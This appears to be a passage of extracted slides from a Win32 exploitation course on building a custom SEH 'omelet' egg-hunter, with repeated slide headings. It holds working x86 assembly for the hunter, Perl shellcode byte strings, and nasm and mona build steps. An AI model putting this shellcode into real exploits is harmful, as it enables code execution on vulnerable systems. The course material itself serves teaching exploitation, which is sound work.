create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
EDI → 0x00000000
Access Violation
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg1.bin"!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg2.bin"!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg3.bin"
egg1
egg2
egg3
egg1 (0x000FDxxx)
egg2 (0x000FDxxx)
egg3 (0x000FDxxx)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1 my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7". “\xD1\xE7\xD1\xE7”; #0x1F80 shift x 7
my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7". “\xD1\xE7\xD1\xE7”; #0x1F80 shift x 7
my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
omit…
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
start: XOR EDI, EDI jmp SHORT reset_stack
create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
start: XOR EDI, EDI jmp SHORT reset_stack
create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / modified shell code 1
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm BITS 32
; egg: ; LL II M1 M2 M3 DD DD DD ... (LL * DD) ; LL == Size of eggs (same for all eggs) ; II == Index of egg (different for each egg) ; M1,M2,M3 == Marker byte (same for all eggs) ; DD == Data in egg (different for each egg)
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
db marker_bytes_location db max_index_location db egg_size_location
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm build C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHun ting\w32 SEH omelet shellcode v0>"c:\Program Files\nasm\nasm.exe" -f bin -o cust om_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHun ting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin she llcode.bin calceggs_custom.txt 127 0xBADA55
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
Thank You :)
See you the week after next week